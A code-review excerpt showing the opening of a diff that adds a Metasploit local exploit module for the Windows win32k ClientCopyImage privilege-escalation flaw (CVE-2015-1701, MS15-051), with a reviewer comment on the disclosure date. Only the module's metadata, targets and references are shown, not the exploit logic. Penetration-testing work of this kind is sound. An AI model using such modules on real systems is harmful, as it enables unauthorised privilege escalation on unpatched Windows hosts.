modules/exploits/windows/local/ms15_051_client_copy_image.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'            => 'Windows ClientCopyImage Win32k Exploit',
+      'Description'     => %q{
+        This module exploits improper object handling in the win32k.sys kernel mode driver.
+        This module has been tested on vulnerable builds of Windows 7 x64 and x86. The
+        exploit should also work on earlier builds of windows.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+          'Unknown',    # vulnerability discovery and exploit in the wild
+          'hfirefox',   # Code released on github
+          'OJ Reeves'   # msf module
+        ],
+      'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'meterpreter' ],
+      'DefaultOptions'  => {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'Payload'         => {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          ['CVE', '2015-1701'],
+          ['MSB', 'MS15-051'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
+          ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
+          ['URL', 'https://technet.microsoft.com/library/security/MS15-051']
+        ],
+      'DisclosureDate'  => 'May 12 2015',
```

Comment:
This date might be wrong, but it's the date that the technet article said it had released the advisory.